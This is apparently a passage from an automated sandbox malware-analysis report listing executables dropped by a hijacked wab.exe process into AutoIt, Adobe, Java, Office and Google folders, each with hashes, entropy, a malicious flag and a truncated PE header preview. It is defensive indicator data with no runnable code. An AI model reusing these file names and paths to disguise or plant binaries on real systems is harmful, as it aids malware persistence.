                                                                                                • Filename: 1716263286d2712d90132eba451811b2abad23213fcee88b437d472a205286a56bdc7957f4476.dat-decoded.exe, Detection: malicious, Browse
                                                                                                Reputation:low
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                                                C:\Program Files (x86)\AutoIt3\Au3Info.exe

                                                                                                Download File
                                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):217704
                                                                                                Entropy (8bit):6.356771671512563
                                                                                                Encrypted:false
                                                                                                SSDEEP:3072:/rk3xFVaK4T6fWSlXe0lJQafeyrR0kr/yh5DEU/Pk13TfwqiTP0McBUNnUxTtd4N:y2K4TSFo5Y683TdiQMcGNUl4N
                                                                                                MD5:0576F2AD6C31F9F557B9166A4E5B1CDE
                                                                                                SHA1:AA825C3A13A9528B2CE553B3CAB4DA4407CAEDF5
                                                                                                SHA-256:6805AA9ADE6C02506EE0E7E4DB52927B8336BC13FA3C10D9B4525B7297A61676
                                                                                                SHA-512:D923411444B35DB3FEF062CBE129CC68FFFB4D8391185B94B93988DF76D6013158245164B837B4C86C529E9CF9848827EE7E564A521255D5A99F1B19F156AD4B
                                                                                                Malicious:true
                                                                                                Joe Sandbox View:
                                                                                                • Filename: kam.cmd, Detection: malicious, Browse
                                                                                                • Filename: 1716263286d2712d90132eba451811b2abad23213fcee88b437d472a205286a56bdc7957f4476.dat-decoded.exe, Detection: malicious, Browse
                                                                                                Reputation:low
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                                                C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe

                                                                                                Download File
                                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):237160
                                                                                                Entropy (8bit):6.19362218837873
                                                                                                Encrypted:false
                                                                                                SSDEEP:3072:/rkMyRnuBGwl/1Gc9QnvGqyWQ93kr/yh5DEU/P5kP0zU35iuvQBUeGMLu:4l3wdYtcH9b5Y651zU77Ea
                                                                                                MD5:6F302C0AA579B094CBE24E5B4DBD6D47
                                                                                                SHA1:35C560D585FB0308949C02F8EC53DA22C7FA19AD
                                                                                                SHA-256:4EC88EB380899460D7DF0DFC23E52CD4320306AAA2954AB78B1A5EF0CA3BD77C
                                                                                                SHA-512:3817838FCEBEEF09CA3001B0B338CFF8BB74C42B73F2618016FC8294249609FA6CD65C955326D641E90F7DB74AEB00F90F6F3267A3071752BD2896A411513940
                                                                                                Malicious:true
                                                                                                Joe Sandbox View:
                                                                                                • Filename: kam.cmd, Detection: malicious, Browse
                                                                                                • Filename: 1716263286d2712d90132eba451811b2abad23213fcee88b437d472a205286a56bdc7957f4476.dat-decoded.exe, Detection: malicious, Browse
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                                                C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe

                                                                                                Download File
                                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):1675872
                                                                                                Entropy (8bit):7.428945763224762
                                                                                                Encrypted:false
                                                                                                SSDEEP:24576:NC51xB6B9YNgqe1xTVIlz7X9zOo4PjnikEpx/nLWvJ+l:yK0eqkSR7Xgo4TiRPnLWvJY
                                                                                                MD5:61D6FED123118E8EE0BC42F1C0762E72
                                                                                                SHA1:F661A58070F467E80BA7592DDC3BB3ECE235A536
                                                                                                SHA-256:2B94D13DCF7D675C9A74E92FAC2B31C4DF2F392ACE777A94C89D431979E52A89
                                                                                                SHA-512:2F0AE53557FAA193853E8646663F96A64BD17A078208ADBDD8FC6022002AB7F7D63EDD75FC9D44ADC1D5C744DC38CA16896A7DB381179685F04E6E59089144DB
                                                                                                Malicious:true
                                                                                                Joe Sandbox View:
                                                                                                • Filename: kam.cmd, Detection: malicious, Browse
                                                                                                • Filename: 1716263286d2712d90132eba451811b2abad23213fcee88b437d472a205286a56bdc7957f4476.dat-decoded.exe, Detection: malicious, Browse
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                                                C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe

                                                                                                Download File
                                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):1841760
                                                                                                Entropy (8bit):7.32243413749646
                                                                                                Encrypted:false
                                                                                                SSDEEP:24576:LEeK2NocwiN/jc41p3qp11JsqbhOUe1xTVIlz7X9zOo4PjnikEpx/nLWvJ+i:ZfYP1JsEDkSR7Xgo4TiRPnLWvJD
                                                                                                MD5:783C051072E1D238DA994E95DABCBF6E
                                                                                                SHA1:1CB52C65962C8DD150B5ED7172631E14824A5102
                                                                                                SHA-256:C61EA0A64369DB217167BECC7A4D01AC2C97FA1D8CAD43189DCBEDD7F0142557
                                                                                                SHA-512:16ED187A7BB9AEA9278ADB0C43EF4B5A4D58228A4B66441377CFF5EDBAA4A84220AC0E7760DE606DBFA4672E82D99C6242FEC59946B33C1DBD4328DCB573EF5D
                                                                                                Malicious:true
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                                                C:\Program Files (x86)\AutoIt3\Aut2Exe\upx.exe

                                                                                                Download File
                                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):346624
                                                                                                Entropy (8bit):7.791635057531845
                                                                                                Encrypted:false
                                                                                                SSDEEP:6144:LpXDXz7yIrozs0WuNd3ojusBdgnNW6r4F53ttuGENGFdVCLEYnPO1D7YYoSyZCWz:L9zGImAjJdcH4j3ttzFdVCLNSfHoSWCG
                                                                                                MD5:B54F778BABB81D6C30BFA202F89EEE0D
                                                                                                SHA1:3D027D339CC635F6BA046CB90B041877CF562162
                                                                                                SHA-256:6090BBD5F090319967C17CDC4E2465EB8A680EE84647E863451B9B51453EE8AF
                                                                                                SHA-512:0B39C94016120EE7FE21DD9D1DC41AFB61330DAE90362F14F97A716304311EAD9D6BFFC44DD70C8B596802DAE6FF8F94504A3C56C6BE1914C1435CBEBBDA24EE
                                                                                                Malicious:true
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                                                C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe

                                                                                                Download File
                                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):165976
                                                                                                Entropy (8bit):5.7704448291370625
                                                                                                Encrypted:false
                                                                                                SSDEEP:3072:/rk3okvQ4gXIRSG+7IJqC3CJyoDjpBnjkP0XGx2SYg+b/Q+y1s3:pnGZLknnj1X62SYdb4I
                                                                                                MD5:6C5024852E53944BC5E619032E91EE75
                                                                                                SHA1:F3AF98C27CE37CF0157871DF3C376052F8F9312A
                                                                                                SHA-256:13AE96DD7EEA7B543FBF94CF173E0BAFB62C6604816D0C975DF0332E49F84582
                                                                                                SHA-512:84D6C4FACB7478128121755E024249599B1B0F71CDF1CD1A11CD6AE53C982367511ADCF8FA97021AEEBF01EFD9FA86051C8CF371D21153087F775069C792187F
                                                                                                Malicious:true
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                                                C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe

                                                                                                Download File
                                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):1113176
                                                                                                Entropy (8bit):6.40004020826486
                                                                                                Encrypted:false
                                                                                                SSDEEP:24576:2TC6Rb6qu1PyC+NRLtpScpzbtT7pyOolKL8Sq/jrc5xaNIBg:2+6AqSPyC+NltpScpzbtvpJoMQSq/jrL
                                                                                                MD5:42A434581A9BB44B8530A921550CF17E
                                                                                                SHA1:3E0078F0BA260036000968579F58BCCDBCD61769
                                                                                                SHA-256:67CEA6E433605652DA3BC35A75C9DE5222DFBEA9F063744037CD79BFF516D84E
                                                                                                SHA-512:9E391F0D8B059413373B68BBD5D0D2AD1B6397C238D2D26D32CAC1AA15CCD3202F514330967722F91DA4E7BA550D5892CFF4DA63B1EB6A66A14C9C463F66A1DB
                                                                                                Malicious:true
                                                                                                Antivirus:
                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                                                C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe

                                                                                                Download File
                                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):2414080
                                                                                                Entropy (8bit):6.710317121419989
                                                                                                Encrypted:false
                                                                                                SSDEEP:49152:h0GSXoV72tpV9XE8Wwi1aCvYMdRluS/fYw44RxL8:e4OEtwiICvYMpfc
                                                                                                MD5:A24DA8C79D1B52417FFE52CC6A36A43A
                                                                                                SHA1:141012704D8BE413B7D7BF129B184764B7439179
                                                                                                SHA-256:1EB0A26BC91C6AA08A426DDDFF8615E5A0D374E9AC6E89FF0C2EB0C73763A913
                                                                                                SHA-512:669911D738DA068785CBE44F2D8FB92AD18F08E7A8418EAF549E93D6DEC816F7242D71E3EA1A5F89FA3685E9415630E38FE4059D6B296148CF340A94AD662EEB
                                                                                                Malicious:true
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                                                C:\Program Files (x86)\AutoIt3\Uninstall.exe

                                                                                                Download File
                                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):113233
                                                                                                Entropy (8bit):6.280496469967927
                                                                                                Encrypted:false
                                                                                                SSDEEP:1536:sEl9bbS3VofCrNGqLtZnMjbPmsAYBdTU9fEAIS2PEtuGCrK:/rkACrNGEtajbefY/TU9fE9PEtuGCrK
                                                                                                MD5:72C8B1DC3E7AEAD3B804FB784C9202DF
                                                                                                SHA1:5FDA23CBB7C3E82A938CE412C3C1574B1FB6350F
                                                                                                SHA-256:2CF1A48566846598E7134EB1F5E402937E1E0F4EDB4B522D2CB44681076882B2
                                                                                                SHA-512:DD5E57335DEA15FDC81198636D7ACFF27B49A8D0C50BBC8B26E3106A149D9889E1DDABB277CFA8279204B82155111DDE933E64203C5715D290017F9BBD169914
                                                                                                Malicious:true
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                                                C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe

                                                                                                Download File
                                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):409608
                                                                                                Entropy (8bit):6.339039046737096
                                                                                                Encrypted:false
                                                                                                SSDEEP:6144:UvqF1Ged2RYbguEuFuTkdj+zRGa7JkjrXyPyMMWvpBVOaqahUqjAGT:xbgvuFuQdj+zRTJkX8yMhB3jhBAi
                                                                                                MD5:8D0A97059A190F777B425ECF1E8E9442
                                                                                                SHA1:C450D9422A0DB8C39A274C1F3EBB2255A4D40E03
                                                                                                SHA-256:029089E37E60DA6EE61E08C9C92E0FC48DE78D3FF53A566A71FB9795359E0196
                                                                                                SHA-512:609093002FB13CD8776BAC599EC0E3D999F4BB71DC3128834A3E5A7642E85BF0B694A834E898B6A0614F4B0E2F3A7A87D99030DB7677DBC55F140079CB304C19
                                                                                                Malicious:true
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                                                C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe

                                                                                                Download File
                                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):214512
                                                                                                Entropy (8bit):6.242999725098675
                                                                                                Encrypted:false
                                                                                                SSDEEP:3072:/rkfGnUI/9FXK4+PoSZSb5qURwubvvnzdl1CkTlxAenDl3SoxceC76JNKjzDI5:KGUcsvZZvUmubv7hTHA8l3yROJyDI5
                                                                                                MD5:D90DDA30DA5ED08959042648374D9153
                                                                                                SHA1:37FD707B384D7684584D6D6B45FC75EDA02FFFBF
                                                                                                SHA-256:F01F16359CC5BEAAC9A59BDAAA78BBB172F5B852875FDCC7CDB90C10F6AC22AF
                                                                                                SHA-512:C27C0493D611882BE6FA63C3A3AD1B0FBDA7F2D4FDCDB0DCAB363DA3FEA78AA1814DAF31A86EF3064B39B20F0E41E87A851E506F54D89C47E856923E8788EC5B
                                                                                                Malicious:true
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                                                C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe

                                                                                                Download File
                                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):568400
                                                                                                Entropy (8bit):6.589660608389939
                                                                                                Encrypted:false
                                                                                                SSDEEP:12288:TyvTCXdXikLj2jR7trg6Qi3vYsKTU00vq:TyyLj8trn3wsq0vq
                                                                                                MD5:267DDE27EAF6950E8CA2FAB44777A6A1
                                                                                                SHA1:940CD4BFA9B26FD75B23799055124DBE7AEC548A
                                                                                                SHA-256:7B7F7DF16EC41961DAEC3DCE736D6127F9ABA03779BEC8B65EA24553FD1B52DA
                                                                                                SHA-512:1FB1A1CB24D549539F87CDDAEC0F54DF66B7DC3C1C9C0BDAA8DED690AC722F846380D034422110F52F171D5148C78B745D4FC88C6B98A23F3CFE064CE2CDFBD9
                                                                                                Malicious:true
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                                                C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe

                                                                                                Download File
                                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):1252432
                                                                                                Entropy (8bit):6.722333632620241
                                                                                                Encrypted:false
                                                                                                SSDEEP:24576:j0n7Ubxk/uRvJqLGJLQ4a56duA/85RkV4l7/ZeoMOp:o4iwwGJra0uAUfkVy7/ZX
                                                                                                MD5:807BDA887A05224A70C5F1AF88260DC0
                                                                                                SHA1:40730E1667845DF510113D6A477BEDC0ACEE36CB
                                                                                                SHA-256:72AD734C38933328D519289803AD0B298949FD607A90DBB31D6D04CE39514A90
                                                                                                SHA-512:4BD27971FE05BAE431C2EF948265F457DB368331860B6DDB5C96F6DF5BB09F5548C737315EA2D7ECBF81E3E8885AF26D61ED95F4C050DFD8BE833ABD06733BB9
                                                                                                Malicious:true
                                                                                                Antivirus:
                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                                                C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe

                                                                                                Download File
                                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):790096
                                                                                                Entropy (8bit):6.685520086044301
                                                                                                Encrypted:false
                                                                                                SSDEEP:12288:lMvcR0D0B6PyxoxIlZwM+R6R4uFjs1Z7FMN0TzJqccvbXkN58AuimIh:dR0gB6axoCfyR6RLQRF/TzJqe58BimIh
                                                                                                MD5:611DE7B526AD3AD4E09E47C1B86367D9
                                                                                                SHA1:583621B2438FAF2B485C7D4FBEF403747CD57EEF
                                                                                                SHA-256:A62D1854968811331942010168652BB4C33F2EAC89067A91AA70F16D711FE2E2
                                                                                                SHA-512:04296781297F2F306E0DF63EDD314979DD37EBAF334D6E58DE9DA8BA095C3BA8210E8A4A4EFBB8A51CEC06B9DE12B659F431056648558C792A80D167DE975728
                                                                                                Malicious:true
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                                                C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\LICLUA.EXE

                                                                                                Download File
                                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):562776
                                                                                                Entropy (8bit):6.325980130189127
                                                                                                Encrypted:false
                                                                                                SSDEEP:6144:s0dzerObMhDGJ9UM3sunrXj9BMHmD1tYFLqY/W5R02qO7VKCy7KCzDSEBPj:beqbWqB3sunrT9+aYFLq3ny7JSEBPj
                                                                                                MD5:ADA3590FA13D77AF34248A7A04D577C4
                                                                                                SHA1:5016D3685BB6571982250A3B8414BB002408CB32
                                                                                                SHA-256:6CDB640EE5BDA123CFEF08A8E423851C050CEA0784ECB9BFEF50D07C17F01A5A
                                                                                                SHA-512:669E54F4C248B265DC8C422E642B79DB44C60051F7782258A9B8A0725170E7229CE4BFD48F5980BD6C099096F7DE91B3ADDE32D6098D099B5BF2CC5FDB0DD426
                                                                                                Malicious:true
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                                                C:\Program Files (x86)\Common Files\Microsoft Shared\VSTO\10.0\VSTOInstaller.exe

                                                                                                Download File
                                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):127512
                                                                                                Entropy (8bit):5.882565985204679
                                                                                                Encrypted:false
                                                                                                SSDEEP:3072:/rkQPo10JOSdnvEhEyr1hg9uCRFRzsxeZ:ng1MOc81hmRFJs0Z
                                                                                                MD5:2410DBD92B226D1A105A7DD336B7E89B
                                                                                                SHA1:4A75AE111CC58ED86D157D69C139AEE5D5753B3D
                                                                                                SHA-256:87102C0F0150FDF75EF59A2E9B83BF9FD5A82A333AEBA3E64FF0CEBF1C9CE326
                                                                                                SHA-512:96BB8E23F7A78FE9E335A3AB17B78F6B33D85E6EAC34CD8096EC7C98EAA3B1233442566903A56F6DE0CAD915EC097CC9146F7E43D0DEC1E31AFA2F193020212F
                                                                                                Malicious:true
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                                                C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe

                                                                                                Download File
                                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):299136
                                                                                                Entropy (8bit):6.630224066462407
                                                                                                Encrypted:false
                                                                                                SSDEEP:6144:s0LYbH0QQchx73BeFStIhEWDoZvynCMj+TwW:s0EbH0j4x7R6SvyCMqn
                                                                                                MD5:4839E0285791329EE319914A14C4C058
                                                                                                SHA1:CF7469B3BBAB3EF5E287376DBA5DCC92D581D109
                                                                                                SHA-256:06566B85A4C8B77CF33EE7F9D7481F8AA6E50FC52EFBA3FE103E3AFC01373FF6
                                                                                                SHA-512:D24B83666C2DE41C8C486DEF297C1A0E0B1D863B56A326B743ECAC49AE66D745F61ECCAD3E9A3BE87A84072641F200429DEFB546622D59095637B3115E3D945C
                                                                                                Malicious:true
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                                                C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe

                                                                                                Download File
                                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):299136
                                                                                                Entropy (8bit):6.632805023719349
                                                                                                Encrypted:false
                                                                                                SSDEEP:6144:slXCs7zYA9xiNFiVg7s/uDoeBvhI7W6w9:slXCs/YAh/elvhI7Wd
                                                                                                MD5:EBA58103571EA9B107B0F846E6C5A2E7
                                                                                                SHA1:1318DB16558A362755692C6B3A4F9786F5A3CD38
                                                                                                SHA-256:66AAA70758C1DD448D8456020D009BFB73003B460DDBEA7F230EE0847725ED07
                                                                                                SHA-512:A2CF3E8EF91B8AA0834D349DA92E43FCB1696C1B404A3F0030627CE08C9A6C81E3AAF33290303545709674FDBDBAF84B22CABCFAC3F7ABB43316AFF0D97D0A32
                                                                                                Malicious:true
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                                                C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe

                                                                                                Download File
                                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):437888
                                                                                                Entropy (8bit):6.304281817676703
                                                                                                Encrypted:false
                                                                                                SSDEEP:12288:sGNKdHVnfiMB7yIL+5IyoiYv5jPaeTmJWIvDxT9ULX8PCM:fKiBLZ05jNTmJWExixM
                                                                                                MD5:9547D26AD745DF9D0CCE708C32590984
                                                                                                SHA1:146AE790CEDE84FA4B245D08B8F057354E39474C
                                                                                                SHA-256:1C79C49A37F32710C7ADDD49922A42E735296E22BA5E22A447AD4C6E4539CA13
                                                                                                SHA-512:85647396FD75D0C64909DE73904419835E5A92F120DB9D592777E304314868D01E867CFC4D6CDDA56391CBF34F1B6420FA1CF7E4742D642416F72994A6ACD073
                                                                                                Malicious:true
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                                                C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe

                                                                                                Download File
                                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):343328
                                                                                                Entropy (8bit):6.499135917181153
                                                                                                Encrypted:false
                                                                                                SSDEEP:6144:okTpB8HHvBjruphfgesnAhAOQp2EwckjQx+m8zhPLlZp3:oklinJruphfg26p2Ewix+m8Nln3
                                                                                                MD5:B0A00074F3B1720E1C604BE0552617EA
                                                                                                SHA1:DB37A895170BBDA9CC760751028C7C0735392DA3
                                                                                                SHA-256:284DBBCA777F4345B9863AC13E44E9430D699214EFB86A86940CE5DD0340587D
